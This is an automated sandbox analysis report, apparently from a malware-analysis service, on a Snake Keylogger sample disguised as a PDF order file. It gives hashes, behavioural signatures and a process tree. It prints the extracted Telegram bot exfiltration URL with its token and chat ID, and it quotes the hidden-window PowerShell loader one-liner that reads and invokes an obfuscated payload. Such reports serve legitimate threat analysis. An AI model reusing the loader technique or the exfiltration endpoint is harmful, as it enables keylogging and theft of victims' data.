Analysis
-
max time kernel
93s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2024 15:49
Static task
static1
Behavioral task
behavioral1
Sample
Order88983273293729387293828PDF.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Order88983273293729387293828PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Bygsukkerets/Wanderlusts.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
Bygsukkerets/Wanderlusts.ps1
Resource
win10v2004-20241007-en
General
-
Target
Order88983273293729387293828PDF.exe
-
Size
687KB
-
MD5
0839190034df3cc414fa255d2283de3c
-
SHA1
ee691b6f85474654165db8ba8bfaee3ba1e536e0
-
SHA256
5fa128e617818eb6d70490ee47e4a8369e053fa5f7f7e79b982a120fe5bfe16d
-
SHA512
6f64f51cf8b428959a83e7e2da743faec564d9c71659a51696cea4f9bc5b70fc713a010dcf3d99de47534cabba39e9e9616a34ded6633b891ea7ea7f93127903
-
SSDEEP
12288:G0mnA1zcV/ErmWHObMmFPOeK5Wia8r9t3DSDb4NP:uA1zcMmJomFPs5We3ew5
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7610532139:AAFiI3HHwFD6pWziyPu3lWJbRKPQtz0nD2c/sendMessage?chat_id=6680692809
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/2356-62-0x0000000001200000-0x0000000002454000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2520 powershell.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 2356 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2356 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2520 powershell.exe 2356 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\propangas.lem Order88983273293729387293828PDF.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3824 2356 WerFault.exe 95 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Order88983273293729387293828PDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2520 powershell.exe Token: SeIncreaseQuotaPrivilege 2520 powershell.exe Token: SeSecurityPrivilege 2520 powershell.exe Token: SeTakeOwnershipPrivilege 2520 powershell.exe Token: SeLoadDriverPrivilege 2520 powershell.exe Token: SeSystemProfilePrivilege 2520 powershell.exe Token: SeSystemtimePrivilege 2520 powershell.exe Token: SeProfSingleProcessPrivilege 2520 powershell.exe Token: SeIncBasePriorityPrivilege 2520 powershell.exe Token: SeCreatePagefilePrivilege 2520 powershell.exe Token: SeBackupPrivilege 2520 powershell.exe Token: SeRestorePrivilege 2520 powershell.exe Token: SeShutdownPrivilege 2520 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeSystemEnvironmentPrivilege 2520 powershell.exe Token: SeRemoteShutdownPrivilege 2520 powershell.exe Token: SeUndockPrivilege 2520 powershell.exe Token: SeManageVolumePrivilege 2520 powershell.exe Token: 33 2520 powershell.exe Token: 34 2520 powershell.exe Token: 35 2520 powershell.exe Token: 36 2520 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3820 wrote to memory of 2520 3820 Order88983273293729387293828PDF.exe 83 PID 3820 wrote to memory of 2520 3820 Order88983273293729387293828PDF.exe 83 PID 3820 wrote to memory of 2520 3820 Order88983273293729387293828PDF.exe 83 PID 2520 wrote to memory of 2356 2520 powershell.exe 95 PID 2520 wrote to memory of 2356 2520 powershell.exe 95 PID 2520 wrote to memory of 2356 2520 powershell.exe 95 PID 2520 wrote to memory of 2356 2520 powershell.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\Order88983273293729387293828PDF.exe"C:\Users\Admin\AppData\Local\Temp\Order88983273293729387293828PDF.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Priodont=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Bygsukkerets\Wanderlusts.Uto';$Astigmometer=$Priodont.SubString(54031,3);.$Astigmometer($Priodont)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2356 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 15284⤵
- Program crash
PID:3824
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 2356 -ip 23561⤵PID:4424
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
52KB
MD597c0731e8a832706f3f157e89ce3999b
SHA18665ec5d2421bf666bd1bdc2b81876f582aa7a5d
SHA256e7d18aee03c79a8a55e2f0fc47ad0693c0bd5ba584b879c82624b4c80946b432
SHA512283ab18b29f488197daaeec4e7ddfc2b707e13c15c308c7f2b3b8bb492833e2a0bff70a5fe4ef5b2cce51830492785fc6c13a1eb69c60db39578dd5a39b78731
-
Filesize
326KB
MD541a0aef818dae523435f54eb98ff88f9
SHA193da6f2ef2ab3bea4c73f20a2ebc7f95e6681f61
SHA25661d60ca1a35c5bb84b9677fe0da44cda8ec2a59a2097d3dc3041d3539535ab5d
SHA512654088bbf83b800b52d3a3a1497b39d739ed6af1c939f89e43233073d8fc3ba2bbec724400169504bbdfa3235eb69cc5b0b55638f3aa147e3998eb149c43f337
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82